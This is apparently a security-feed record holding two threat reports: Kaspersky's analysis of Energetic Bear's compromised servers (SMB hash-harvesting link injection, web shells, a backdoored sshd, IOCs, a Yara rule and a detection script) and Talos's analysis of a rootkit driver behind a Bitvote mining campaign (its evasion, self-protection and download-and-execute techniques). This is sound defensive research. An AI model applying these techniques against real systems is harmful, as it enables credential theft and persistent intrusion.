_\n\n_Recent activity of the group against US organizations was discussed in a _[_US-CERT_](<https://www.us-cert.gov/ncas/alerts/TA18-074A>)_ advisory, which linked the actor to the Russian government, as well as an advisory by the _[_UK National Cyber Security Centre_](<https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control>)_. _\n\n_This report by _[_Kaspersky Lab ICS CERT_](<https://ics-cert.kaspersky.com/>)_ presents information on identified servers that have been infected and used by the group. The report also includes the findings of an analysis of several webservers compromised by the Energetic Bear group during 2016 and in early 2017_.\n\n## Attack victims\n\nThe table below shows the distribution of compromised servers (based on the language of website content and/or the origins of the company renting the server at the time of compromise) by countries, attacked company types and the role of each server in the overall attack scheme. Victims of the threat actor's attacks were not limited to industrial companies.\n\n**Table 1. 
Compromised servers**\n\n**Country** | **Description** | **Role in the attack** \n---|---|--- \n**Russia** | Opposition political website | Waterhole \nReal estate agency | Auxiliary (collecting user data in the waterhole attack) \nFootball club | Waterhole \nDeveloper and integrator of secure automation systems and IS consultant | Waterhole \nDevelopers of software and equipment | Auxiliary (collecting user data in the waterhole attack, tool hosting) \nInvestment website | Auxiliary (collecting user data in the waterhole attack) \n**Ukraine** | Electric power sector company | Waterhole \nBank | Waterhole \n**UK** | Aerospace company | Waterhole \n**Germany** | Software developer and integrator | Waterhole \nUnknown | Auxiliary (collecting user data in the waterhole attack) \n**Turkey** | Oil and gas sector enterprise | Waterhole \nIndustrial group | Waterhole \nInvestment group | Waterhole \n**Greece** | Server of a university | Auxiliary (collecting user data in the waterhole attack) \n**USA** | Oil and gas sector enterprise | Waterhole \n**Unknown** | Affiliate network site | Auxiliary (collecting user data in the waterhole attack) \n \n## Waterhole\n\nAll waterhole servers are infected following the same pattern: injecting a link into a web page or JS file with the following file scheme: file://IP/filename.png.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124232/180418-energetic-bear-crouching-yeti-1.png>)\n\n_Injected link with the file scheme_\n\nThe link is used to initiate a request for an image, as a result of which the user connects to the remote server over the SMB protocol. 
In this attack type, the attackers' goal is to extract the following data from the session:\n\n * user IP,\n * user name,\n * domain name,\n * NTLM hash of the user's password.\n\nIt should be noted that the image requested using the link is not physically located on the remote server.\n\n## Scanned resources\n\nCompromised servers are in some cases used to conduct attacks on other resources. In the process of analyzing infected servers, numerous websites and servers were identified that the attackers had scanned with various tools, such as nmap, dirsearch, sqlmap, etc. (tool descriptions are provided below).\n\n**Table 2. Resources that were scanned from one of the infected servers**\n\n**Country \n(based on the content)** | **Description** \n---|--- \n**Russia** | Non-profit organization \nSale of drugs \nTravel/maps \nResources based on the Bump platform (platform for corporate social networks) \u2013 non-profit organization, social network for college/university alumni, communication platform for NGOs, etc. \nBusiness \u2013 photographic studio \nIndustrial enterprise, construction company \nDoor manufacturing \nCryptocurrency exchange \nConstruction information and analysis portal \nPersonal website of a developer \nVainah Telecom IPs and Subnets (Chechen Republic) \nVarious Chechen resources (governmental organizations, universities, industrial enterprises, etc.) \nWeb server with numerous sites (alumni sites, sites of industrial and engineering companies, etc.) 
\nMuslim dating site \n**Brazil** | Water treatment \n**Turkey** | Hotels \nEmbassy in Turkey \nSoftware developer \nAirport website \nCity council website \nCosmetics manufacturer \nReligious website \nTurktelekom subnet with a large number of sites \nTelnet Telecom subnet with a large number of sites \n**Georgia** | Personal website of a journalist \n**Kazakhstan** | Unknown web server \n**Ukraine** | Office supplies online store \nFloral business \nImage hosting service \nOnline course on sales \nDealer of farming equipment and spare parts \nUkrainian civil servant's personal website \nOnline store of parts for household appliance repair \nTimber sales, construction \nTennis club website \nOnline store for farmers \nOnline store of massage equipment \nOnline clothes store \nWebsite development and promotion \nOnline air conditioner store \n**Switzerland** | Analytical company \n**US** | Web server with many domains \n**France** | Web server with many domains \n**Vietnam** | Unknown server \n**International** | Flight tracker \n \nThe sites and servers on this list do not seem to have anything in common. 
Even though the scanned servers do not necessarily look like potential final victims, it is likely that the attackers scanned different resources to find a server that could be used to establish a foothold for hosting the attackers' tools and, subsequently, to develop the attack.\n\nSome of the sites scanned may have been of interest to the attackers as candidates for hosting waterhole resources.\n\nIn some cases, the domains scanned were hosted on the same server; sometimes the attackers went through the list of possible domains matching a given IP.\n\nIn most cases, multiple attempts to compromise a specific target were not identified \u2013 with the possible exception of sites on the Bump platform, flight tracker servers and servers of a Turkish hotel chain.\n\nCuriously, the sites scanned included a web developer's website, kashey.ru, and resources that this site linked to. These may have been links to resources developed by the site's owner: [www.esodedi.ru](<http://www.esodedi.ru>), [www.i-stroy.ru](<http://www.i-stroy.ru>), [www.saledoor.ru](<http://www.saledoor.ru>)\n\n## Toolset used\n\n### Utilities\n\nUtilities found on compromised servers are open-source and publicly available on GitHub:\n\n * Nmap \u2013 an open-source utility for analyzing the network and verifying its security.\n * [Dirsearch](<https://github.com/maurosoria/dirsearch>) \u2014 a simple command-line tool for brute forcing (performing exhaustive searches of) directories and files on websites.\n * [Sqlmap](<https://github.com/sqlmapproject/sqlmap>) \u2014 an open-source penetration testing tool, which automates the process of identifying and exploiting SQL injection vulnerabilities and taking over database servers.\n * [Sublist3r](<https://github.com/aboul3la/Sublist3r>) \u2014 a tool written in Python designed to enumerate website subdomains. The tool uses open-source intelligence ([OSINT](<https://ru.wikipedia.org/wiki/OSINT>)). 
Sublist3r supports many different search engines, such as Google, Yahoo, Bing, Baidu and Ask, as well as such services as Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. The tool helps penetration testers to collect information on the subdomains of the domain they are researching.\n * [Wpscan](<https://github.com/wpscanteam/wpscan>) \u2014 a WordPress vulnerability scanner that uses the blackbox principle, i.e., works without access to the source code. It can be used to scan remote WordPress sites in search of security issues.\n * [Impacket](<https://github.com/CoreSecurity/impacket>) \u2014 a toolset for working with various network protocols, which is required by SMBTrap.\n * [SMBTrap](<https://github.com/CylanceSPEAR/SMBTrap>) \u2014 a tool for logging data received over the SMB protocol (user IP address, user name, domain name, password NTLM hash).\n * [Commix](<https://github.com/commixproject/commix>) \u2014 a vulnerability search and command injection and exploitation tool written in Python.\n * [Subbrute](<https://github.com/TheRook/subbrute>) \u2013 a subdomain enumeration tool available for Python and Windows that uses an open name resolver as a proxy and does not send traffic to the target DNS server.\n * [PHPMailer](<https://github.com/PHPMailer/PHPMailer>) \u2013 a mail sending tool.\n\nIn addition, a custom Python script named ftpChecker.py was found on one of the servers. 
The script was designed to check FTP hosts from an incoming list.\n\n### Malicious PHP files\n\nThe following malicious PHP files were found in different directories in the nginx folder and in a working directory created by the attackers on infected web servers:\n\n**File name** | **Brief description** | **md5sum** | **Time of the latest file change (MSK)** | **Size, bytes** \n---|---|---|---|--- \nini.php | wso shell + mail | f3e3e25a822012023c6e81b206711865 | 2016-07-01 15:57:38 | 28786 \nmysql.php | wso shell + mail | f3e3e25a822012023c6e81b206711865 | 2016-06-12 13:35:30 | 28786 \nopts.php | wso shell | c76470e85b7f3da46539b40e5c552712 | 2016-06-12 12:23:28 | 36623 \nerror_log.php | wso shell | 155385cc19e3092765bcfed034b82ccb | 2016-06-12 10:59:39 | 36636 \ncode29.php | web shell | 1644af9b6424e8f58f39c7fa5e76de51 | 2016-06-12 11:10:40 | 10724 \nproxy87.php | web shell | 1644af9b6424e8f58f39c7fa5e76de51 | 2016-06-12 14:31:13 | 10724 \ntheme.php | wso shell | 2292f5db385068e161ae277531b2e114 | 2017-05-16 17:33:02 | 133104 \nsma.php | PHPMailer | 7ec514bbdc6dd8f606f803d39af8883f | 2017-05-19 13:53:53 | 14696 \nmedia.php | wso shell | 78c31eff38fdb72ea3b1800ea917940f | 2017-04-17 15:58:41 | 1762986 \n \nIn the table above:\n\n * Web shell is a script that allows remote administration of the machine.\n * WSO is a popular web shell and file manager (it stands for \"Web Shell by Orb\") that has the ability to masquerade as an error page containing a hidden login form. 
It is available on GitHub:\n\n<https://github.com/wso-shell/WSO>\n\nTwo of the PHP scripts found, ini.php and mysql.php, contained a WSO shell concatenated with the following email spamming script:\n\n<https://github.com/bediger4000/php-malware-analysis/tree/master/db-config.php>\n\nAll the scripts found are obfuscated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124233/180418-energetic-bear-crouching-yeti-2.png>)\n\n_wso shell \u2013 error_log.php_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124232/180418-energetic-bear-crouching-yeti-3.png>)\n\n_Deobfuscated wso shell \u2013 error_log.php_\n\nOne of the web shells was found on the server under two different names (proxy87.php and code29.php). It uses the eval function to execute a command sent via HTTP cookies or a POST request:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124231/180418-energetic-bear-crouching-yeti-4.png>)\n\n_Web shell \u2013 proxy87.php_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124231/180418-energetic-bear-crouching-yeti-5.png>)\n\n_Deobfuscated web shell \u2013 proxy87.php_\n\n### Modified sshd\n\nA modified sshd with a preinstalled backdoor was found in the process of analyzing the server.\n\nPatches with some versions of backdoors for sshd that are similar to the backdoor found are available on GitHub, for example:\n\n<https://github.com/jivoi/openssh-backdoor-kit>\n\nCompilation is possible on any OS with binary compatibility.\n\nAs a result of replacing the original sshd file with a modified one on the infected server, an attacker can use a 'master password' to get authorized on the remote server, while leaving minimal traces (compared to an ordinary user connecting via ssh).\n\nIn addition, the modified sshd logs all legitimate ssh connections (this does not apply to the connection that uses the 'master password'), including 
connection times, account names and passwords. The log is encrypted and is located at /var/tmp/.pipe.sock.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124232/180418-energetic-bear-crouching-yeti-6.png>)\n\n_Decrypted log at /var/tmp/.pipe.sock_\n\n## Activity of the attackers on compromised servers\n\nIn addition to using compromised servers to scan numerous resources, other attacker activity was also identified.\n\nAfter gaining access to the server, the attackers installed the tools they needed at different times. Specifically, the following commands for third-party installations were identified on one of the servers:\n\n * apt install traceroute\n * apt-get install nmap\n * apt-get install screen\n * git clone https://github.com/sqlmapproject/sqlmap.git\n\nAdditionally, the attackers installed any packages and tools for Python they needed.\n\nThe diagram below shows times of illegitimate logons to one of the compromised servers during one month. The attackers checked the smbtrap log file on working days. In most cases, they logged on to the server at roughly the same time of day, probably in the morning hours:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124231/180418-energetic-bear-crouching-yeti-7.png>)\n\n_Times of illegitimate connections with the server (GMT+3)_\n\nIn addition, in the process of performing the analysis, an active process was identified that exploited SQL injection and collected data from a database of one of the victims.\n\n## Conclusion\n\nThe findings of the analysis of compromised servers and the attackers' activity on these servers are as follows:\n\n 1. With rare exceptions, the group's members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group 'markers' very difficult.\n 2. 
Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.\n 3. In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.\n 4. The diversity of victims may indicate the diversity of the attackers' interests.\n 5. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack's further development.\n\n## Appendix I \u2013 Indicators of Compromise\n\n### Filenames and Paths\n\n#### Tools*\n\n/usr/lib/libng/ftpChecker.py \n/usr/bin/nmap/ \n/usr/lib/libng/dirsearch/ \n/usr/share/python2.7/dirsearch/ \n/usr/lib/libng/SMBTrap/ \n/usr/lib/libng/commix/ \n/usr/lib/libng/subbrute-master/ \n/usr/share/python2.7/sqlmap/ \n/usr/lib/libng/sqlmap-dev/ \n/usr/lib/libng/wpscan/ \n/usr/share/python2.7/wpscan/ \n/usr/share/python2.7/Sublist3r/\n\n*Note that these tools can also be used by other threat actors.\n\n#### PHP files:\n\n/usr/share/python2.7/sma.php \n/usr/share/python2.7/theme.php \n/root/theme.php \n/usr/lib/libng/media.php\n\n#### Logs\n\n/var/tmp/.pipe.sock\n\n### PHP file hashes\n\nThe MD5 hashes of the malicious PHP files are listed in the md5sum column of the malicious PHP files table above.\n\n### Yara rules\n\nrule Backdoored_ssh { \nstrings: \n$a1 = \"OpenSSH\" \n$a2 = \"usage: ssh\" \n$a3 = \"HISTFILE\" \ncondition: \nuint32(0) == 0x464c457f and filesize<1000000 and all of ($a*) \n}\n\n## Appendix II \u2013 Shell script to check a server for tools\n\n### Shell script for 
Debian\n\ncd /tmp \nworkdir=428c5fcf495396df04a459e317b70ca2 \nmkdir $workdir \ncd $workdir \nfind / -type d -iname smbtrap > find-smbtrap.txt 2>/dev/null \nfind / -type d -iname dirsearch > find-dirsearch.txt 2>/dev/null \nfind / -type d -iname nmap > find-nmap.txt 2>/dev/null \nfind / -type d -iname wpscan > find-wpscan.txt 2>/dev/null \nfind / -type d -iname sublist3r > find-sublist3r.txt 2>/dev/null \ndpkg -l | grep -E \\\\(impacket\\|pcapy\\|nmap\\\\) > dpkg-grep.txt \ncp /var/lib/dpkg/info/openssh-server.md5sums . #retrieve initial hash for sshd \nmd5sum /usr/sbin/sshd > sshd.md5sum #calculate actual hash for sshd\n\n### Shell script for Centos\n\ncd /tmp \nworkdir=428c5fcf495396df04a459e317b70ca2 \nmkdir $workdir \ncd $workdir \nfind / -type d -iname smbtrap > find-smbtrap.txt 2>/dev/null \nfind / -type d -iname dirsearch > find-dirsearch.txt 2>/dev/null \nfind / -type d -iname nmap > find-nmap.txt 2>/dev/null \nfind / -type d -iname wpscan > find-wpscan.txt 2>/dev/null \nfind / -type d -iname sublist3r > find-sublist3r.txt 2>/dev/null \nrpm -qa | grep -E \\\\(impacket\\|pcapy\\|nmap\\\\) > rpm-grep.txt \nrpm -qa -dump | grep ssh > rpm-qa-dump.txt #retrieve initial hash for sshd \nsha256sum /usr/sbin/sshd > sshd.sha256sum #calculate actual sha256 hash for sshd \nmd5sum /usr/sbin/sshd > sshd.md5sum #calculate actual md5 hash for sshd\n\n[ **Energetic Bear/Crouching Yeti: attacks on servers**](<https://ics-cert.kaspersky.com/media/EB_public_FINAL_EN_20042018.pdf>)", "reporter": "Kaspersky Lab ICS CERT", "published": "2018-04-23T10:00:36", "type": "securelist", "title": "Energetic Bear/Crouching Yeti: attacks on servers", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-23T10:00:36", "id": "SECURELIST:5120B9325810A974F19B2E365EC8516C", "href": "https://securelist.com/energetic-bear-crouching-yeti/85345/", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": 
"2018-04-23T18:38:01", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "### Executive summary\n\n \nSoon after the launch of a new cryptocurrency, Bitvote, in January, Talos discovered a new mining campaign affecting systems in India, Indonesia, Vietnam and several other countries that was tied to Bitvote. \n \nApart from the fact that the attackers have chosen to target the new bitcoin fork in order to gain the early adoption advantage, this campaign is notable for its usage of a kernel-mode driver to manage command and control (C2) infrastructure, configuration management, download and execute functionality, as well as payload protection. It is quite uncommon to implement this functionality in the kernel, apart from the payload protection, and points to a moderate to high level of technical knowledge behind the attack. \n \nThe payloads and the configuration were embedded in specially modified animated GIF files and published as parts of web pages hosted on free blogging platforms. \n \nThe campaign was active in February and March, and so far, it has brought limited returns for attackers. \n \n \n \n\n\n### Introduction\n\n \nOne of the benefits of open-source projects is the ability for other people to create so-called \"forks\" \u2014 copies of the original source code repository \u2014 and to essentially split (fork) the development process in two by creating a separate project with a new development team and a separate development process. \n \nForks also happen with cryptocurrencies. Since the initial release of bitcoin, there have been more than 18,000 forks of bitcoin code on the hosting service GitHub, although only a few of them have successfully been launched as alternatives to bitcoin. \n \nWhile some, such as Bitcoin Cash, Bitcoin Gold or Litecoin, have been fairly successful, most new forks die out without being noticed by a significant number of users. 
\n \nA frequent reason that forks are created is to improve on the so-called \"one-CPU-one-vote\" principle, which prescribes rules on how the network decides on a transaction's validity. In the original plan laid out by [Bitcoin creator Satoshi Nakamoto](<https://www.google.com/url?q=https://bitcoin.org/bitcoin.pdf&sa=D&ust=1524498497022000>), the miner is awarded proportionally to the amount of computing resources they invested, without explicit mention of the type of hardware that should be used for mining. However, some people took the \"one-CPU-one-vote\" principle \u2014 quite literally \u2014 to mean that desktop CPUs should exclusively be used for mining. \n \nNevertheless, the original practice of bitcoin mining has moved away from using standard desktop system CPUs and GPUs, and into the realm of specialized ASIC-based hardware systems, requiring a significant up-front investment to achieve notable returns for miners. \n \nThis development has seen many home users moving away from mining bitcoin into mining other currencies such as Monero, which is specifically designed to make mining using ASIC more difficult. Monero also increasingly became the currency of choice for malicious mining botnets, which we already covered in [one of our recent blog posts](<https://www.google.com/url?q=https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html&sa=D&ust=1524498497023000>). \n \nOn Jan. 20, an unknown group of developers launched a new bitcoin fork called [Bitvote](<https://www.google.com/url?q=https://bitvote.one/&sa=D&ust=1524498497024000>), with their own view on how to improve on the \"one-CPU-one-vote\" principle, and give desktop users a fairer chance to successfully mine a cryptocurrency. \n \nBitvote uses the [Cryptonight](<https://www.google.com/url?q=https://en.bitcoin.it/wiki/CryptoNight&sa=D&ust=1524498497024000>) algorithm for its proof of work, which is also used by Monero. 
The algorithm is designed to allow standard desktop CPUs to be equal participants in the mining process. \n \nAs cyber criminals move farther away from ransomware, and closer to cryptocurrency mining, it comes as no surprise to find out that a malicious actor decided to take a gamble on Bitvote, and developed a malicious campaign that resulted in the infection of hundreds of systems with a modified version of the cpuminer mining software, recruiting the affected systems into a Bitvote mining pool. \n \nThis post is focused on the driver functionality of Bitvote, although we briefly describe the dropper, as well as the final cryptocurrency mining payload used in this campaign. \n \n\n\n### Calculator with unexpected functionality: The dropper\n\n \nA driver dropper, purporting to be a calculator application, was found by investigating [AMP for Endpoints](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html&sa=D&ust=1524498497025000>) product telemetry. The dropper was spotted in the wild, and blocked on Feb. 6. It is likely to have been a part of a (potentially) unwanted application installer published on sites hosting an alleged version of Microsoft Toolkit, which should allow the user to activate different versions of Microsoft Office and Windows without owning a valid license. \n \nA Microsoft Toolkit bundler installs many potentially unwanted applications (PUAs), but it also installs a file calculator<nnnn>.exe that drops a randomly named kernel mode driver. Earlier calculator dropper variants have been around at least since the last quarter of 2017. \n \nTypically, the malicious functionality of the dropper (written using the MFC framework) is to install the driver in the <Windows>\\system32\\drivers folder with a base filename of eight random characters (e.g., djkeuihk.sys), or with the original name of the driver, which is DrToolKrl.sys. 
After creating the driver file, the dropper creates a Windows service with the same name as the driver file and loads the driver into kernel memory by starting the service. \n \nBefore dropping the driver, the dropper checks if it is executing in a virtual machine environment, under the control of a debugger or in a sandbox. If a virtual machine environment is detected, the malicious driver is not dropped, and the execution continues with the calculator functionality. \n \n\n\n[](<https://2.bp.blogspot.com/--4fRvFciEpg/Wt31CTvxk5I/AAAAAAAAAHA/xD9k7Mw5EO4-LPHQCHAB96WzjI_bfN9GwCLcBGAs/s1600/image5.gif>)\n\nTrojanized Calculator GUI\n\n \nThe dropper checks for the following environments: \n \n\n\n * Parallels\n * VMWare\n * VirtualBox\n * JoeBox\n * GFI Sandbox (CWSandbox)\n * Anubis\n * Sandboxie\n * Debugging Tools for Windows\n \n \nIf a debugging or analysis environment is not detected, the dropper checks the version of the operating system in order to drop the appropriate 32- or 64-bit version of the rootkit driver. It also attempts to communicate with the driver in order to make sure that the driver is not already loaded. \n \n\n\n[](<https://4.bp.blogspot.com/-GLkOgm74tzE/Wt31VngNS0I/AAAAAAAAAHI/m-WBmEQj3cgY6qzHn4TGwor2wwp1PwljgCLcBGAs/s1600/image3.png>)\n\nCheck for the bitness of the operating system and prepare to drop a driver\n\n \n\n\n### Main culprit: The driver\n\n \nThe driver is signed with a certificate belonging to \"Jiangsu innovation safety assessment Co., Ltd.\" with an expired validity period. This means that it will not be loaded by Windows Vista and later versions of 64-bit Windows, which enforce valid driver signatures. On the one hand, this seems like a failure of the attacker's process, as the attack can only target older Windows versions, likely executing on less capable CPUs. 
On the other hand, it may prove to be an advantage for the attacker, as it is more likely that older systems are not fully up to date and protected with the latest security software. Therefore, this attack is less likely to be discovered if only older CPUs are affected. \n \nThe driver contains the functionality to: \n \n\n\n * Manage configuration of the C2 infrastructure\n * Parse configuration files hosted on free blogging platforms to decode the information hidden in animated GIF files published as part of the C2 blogs.\n * Download and execute the final payload (in our case, the Bitvote pool miner agent)\n * Protect the driver from deletion\n * Protect the driver registry entry from third-party access (read and write)\n * Protect payload processes and threads from termination\n * Download and install new driver versions \n * Disable the User Account Control (UAC)\n \n \nApart from the core driver's ability to protect itself and its payload, the driver somewhat unusually contains the download and execute functionalities, which are rarely implemented in kernel mode by well-known malware downloader families. \n \nThis indicates an increased level of proficiency of the author of the driver, who might also be the actor behind this Bitvote mining operation. \n \nHowever, it is also possible that the driver is created by a generic third-party toolkit, which would allow an actor to specify configuration and payload URLs in a simple way. Once the configuration is specified, the toolkit might be used to build and sign the driver, which could also explain the fact that the driver samples were signed with an expired certificate. However, we were not able to find generator samples that would confirm this theory. \n \n\n\n#### Configuration management\n\n \nThe driver initially contained several hardcoded URLs pointing to free blogging platforms, such as Blogspot (Blogger) and the Russian blogging platform LiveJournal. 
Before the hardcoded URLs are accessed, the dropper attempts to download a GIF file from a special URL hardcoded in the dropper body. \n \nThe downloaded GIF file contains an encrypted data blob at offset 0xA0000, with a driver configuration block including the new command and control locations, as well as updated URLs for downloads of payloads. The configuration data block starts with a header containing a magic double word 'lKTD' ('DTKl'), followed by a double word containing a simple addition-based checksum of all bytes in the decoded configuration, a static double word XOR decryption key and a double word count of configuration records within the block. \n \n\n\n[](<https://4.bp.blogspot.com/-s5HqSofLj0U/Wt31oGUyk9I/AAAAAAAAAHQ/FU7Fat-AXNk8WEAgYHzBT2GA5d9H16dtgCLcBGAs/s1600/image13.png>)\n\nDownload and decode driver configuration\n\n \nEach configuration record is 407 bytes long and contains the record type, which may indicate a payload record, a driver update record or a C2 record, followed by a URL, as well as pointers to HTML parsing functions, the local file paths and arguments that should be used when they are launched. \n \nThe configuration is decoded and loaded into the DeviceExtension block of the device object created by the driver in the DriverEntry function. The device extension block is the most important data structure associated with a device object. Its internal structure is driver-defined, and it is typically used to maintain device state information and provide storage for any kernel-defined objects. In our case, the DeviceExtension also stores the in-memory configuration of the malicious driver. \n \n\n\n[](<https://1.bp.blogspot.com/-DBuptSJpLFc/Wt4KCmWsjSI/AAAAAAAAAI8/eWU0sC4sKEINXLsLgFSSHYxSUsMkeHbAwCLcBGAs/s1600/image15a.png>)\n\nThe GIF containing the driver configuration\n\n \nThe IP address of any host is resolved by querying Google's DNS resolver 8.8.8.8. 
Defenders are advised to block direct traffic from standard internal network endpoints to external DNS resolvers, which would prevent the driver from downloading and executing payloads, as well as connecting to the botnet C2 servers, internally referred to as the \"Heart servers.\" \n \nThe host used as the Heart server in this campaign was cdn[.]rmb666[.]me. At the time of the analysis, the domain name resolved to 185.180.14.16, which is also associated with other malicious domains. The domain was registered on Dec. 20, 2017, and it seems to have been used specifically for this campaign. The IP address is hosted in the Czech Republic. The domain has now changed provider, and it points to 91.213.8.57, an IP address hosted in Ukraine. \n \nThe country graph taken from the Cisco Umbrella Investigate tool indicates that the campaign was the most active in Indonesia, with many other countries, such as India, Algeria and Vietnam, being affected. \n \n\n\n[](<https://2.bp.blogspot.com/-4KYWSG13N8c/Wt31_m4YQ4I/AAAAAAAAAHc/LE6DZSSUx70Q4Fhm8Zo-Kept7kbEYxvkACLcBGAs/s1600/image4.png>)\n\nThe top affected countries are Indonesia and India\n\n \nThe driver uses a fairly specific User-Agent string 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/520.16 (KHTML, like Gecko) Chrome/61 Safari/517' when posting the initial data to the C2 server, which may be a good network detection indicator. \n \n\n\n[](<https://4.bp.blogspot.com/-phwqkya8Bbo/Wt32WBZlnvI/AAAAAAAAAHo/rgUGRlL9jScY1nOzaX-UFhRWV23Y5yE_wCLcBGAs/s1600/image7.png>)\n\nInitial Heart server post request example\n\n \n\n\n#### Download and execute functionality\n\n \nOnce the configuration is uploaded, the driver loops over the records and attempts to access the specified URLs. If a URL hosts an HTML file, the driver will parse the page to find an image URL which satisfies the criteria set in the associated HTML parsing function. \n \nIf a target image URL is found, the driver will download the image file. 
The downloaded image files were GIF images with a PE executable payload simply appended to them. The driver then extracts the payload from the image, saves the payload into a destination path set by the configuration record and executes it by changing the process context into Windows Explorer (explorer.exe) and launching the downloaded file using the standard WinExec Windows API function. \n \nThe driver finds the Windows Explorer process identifier (PID) by calling the ZwQuerySystemInformation API to obtain an array of SYSTEM_PROCESS_INFORMATION structures, one for each process in the system. \n \n\n\n[](<https://4.bp.blogspot.com/-IeDkSHJ4uNw/Wt32hMDnBhI/AAAAAAAAAHs/FNinPYtYwVYoGf1QBnOpkHiBoWGQ4fVoACLcBGAs/s1600/image10.png>)\n\nExecute the payload in the context of \"explorer.exe\"\n\n \n\n\n#### Driver protection \n\n \nApart from the core 'download and execute' functionality, the driver implements several protection techniques to protect the driver's file, its own in-memory configuration, its service and the payload process. \n \nTo protect itself, the driver stores its own image and the configuration records within a registry key, and if the original driver is removed from the disk or modified, the modified file is replaced by the original driver, or a new driver copy is created. \n \nIf the driver is not able to restore itself into the old location, it generates a new random eight-character base name, saves the original version of the driver into the newly generated path and creates a new service to point to it. \n \nThe configuration is stored in the DataInfo value of the registry key used by the driver service. For example: \\HKLM\\System\\CurrentControlSet\\Services\\kemamiti\\DataInfo. The service registry key is protected by the driver, and access to it is not allowed as long as the driver is active in memory. 
\n \nFigure: Access to the driver service's registry key is denied by the driver\n\n \n\n\n#### Hiding the driver\n\n \nThe driver attempts to hide by removing itself from the InLoadOrderLinks linked list of loaded modules. The driver accesses the DriverSection pointer of its own _DRIVER_OBJECT, which points to a _LDR_DATA_TABLE_ENTRY structure used to keep the information about the loaded module. \n \nThe driver is removed from the InLoadOrderLinks linked list by modifying both the Flink (forward link) member of the previous list entry and the Blink (backward link) member of the next list entry. \n \nThe driver also zeroes out the DriverName field of the _DRIVER_OBJECT as well as the FullDllName field in the _LDR_DATA_TABLE_ENTRY structure. \n \nFigure: The driver zeroes out its name but BaseDllName still remains\n\n \nThis way, the name of the driver module is not displayed when the loaded module lists are examined by many utilities. For example, if we use the WinDbg extension [SwishDbgExt](<https://www.google.com/url?q=https://github.com/comaeio/SwishDbgExt&sa=D&ust=1524498497038000>), developed by Matthieu Suiche, to display kernel callbacks, the driver module name will not be displayed, although we can still follow hyperlinks to disassemble and analyze the callback code. \n \nFigure: The driver module name is not assigned to callbacks after zeroing out\n\n \n\n\n#### Payload process protection\n\n \nApart from protecting the module and its registry entries, the driver protects the payload process from termination and respawns the process if all of its threads are terminated. 
This is achieved using a documented kernel mechanism, object callbacks: a driver registers functions that the kernel calls whenever a registered event, such as opening a process, is triggered. \n \nThe protection of the process is implemented by calling [ObRegisterCallbacks](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/nf-wdm-obregistercallbacks&sa=D&ust=1524498497039000>) for process objects. When the kernel invokes the callback, the rootkit modifies the DesiredAccess mask in order to prevent other processes from terminating the payload. \n \nThere is some additional filtering: if the process creating a handle to the payload is not explorer.exe or csrss.exe, that process will be unable to terminate the payload. \n \nFigure: Access to the payload process is denied by the driver\n\n \n\n\n#### System callbacks\n\n \nWhen Windows kernel mode rootkits first appeared, they used to hook undocumented operating system structures and tables such as the System Service Dispatch Table (SSDT) or the Interrupt Descriptor Table (IDT), but today they typically use documented interfaces, such as system callbacks, in order to avoid detection by Windows kernel security mechanisms. \n \nOur driver sample is also aware of Windows protection mechanisms, and it uses documented callbacks in order to register functions for its own protection. 
\n \nThe functions used to register callbacks are: \n \n\n\n * [CmRegisterCallback](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/nf-wdm-cmregistercallback&sa=D&ust=1524498497042000>) \\- registry callback for protection of registry values\n * [PsSetCreateProcessNotifyRoutine](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntddk/nf-ntddk-pssetcreateprocessnotifyroutine&sa=D&ust=1524498497043000>) \\- respawning the payload if the payload process is terminated\n * [PsSetLoadImageNotifyRoutine](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntddk/nf-ntddk-pssetloadimagenotifyroutine&sa=D&ust=1524498497043000>) \\- disabling User Account Control\n * [PsSetCreateThreadNotifyRoutine](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntddk/nf-ntddk-pssetcreatethreadnotifyroutine&sa=D&ust=1524498497044000>) \\- registry and driver file protection\n * ObRegisterCallbacks - protecting the payload from termination\n\n### Final payload - the miner\n\n \nThe final payload is a modified cpuminer application downloaded into <Windows>\\winserv,exe. The miner is modified to automatically connect to the btv.vvpool.com site on TCP port 5700 and join a Bitvote mining pool. The application seems to be a minor modification of the open-source cryptocurrency miner cpuminer, and it does not warrant further investigation. \n \nFigure: The miner connects to the pool at TCP port 5700 and sends its address\n\n \nAt the time of writing, we could see that the mining operation had been able to earn just over 4,400 BTV, close to $1,500. 
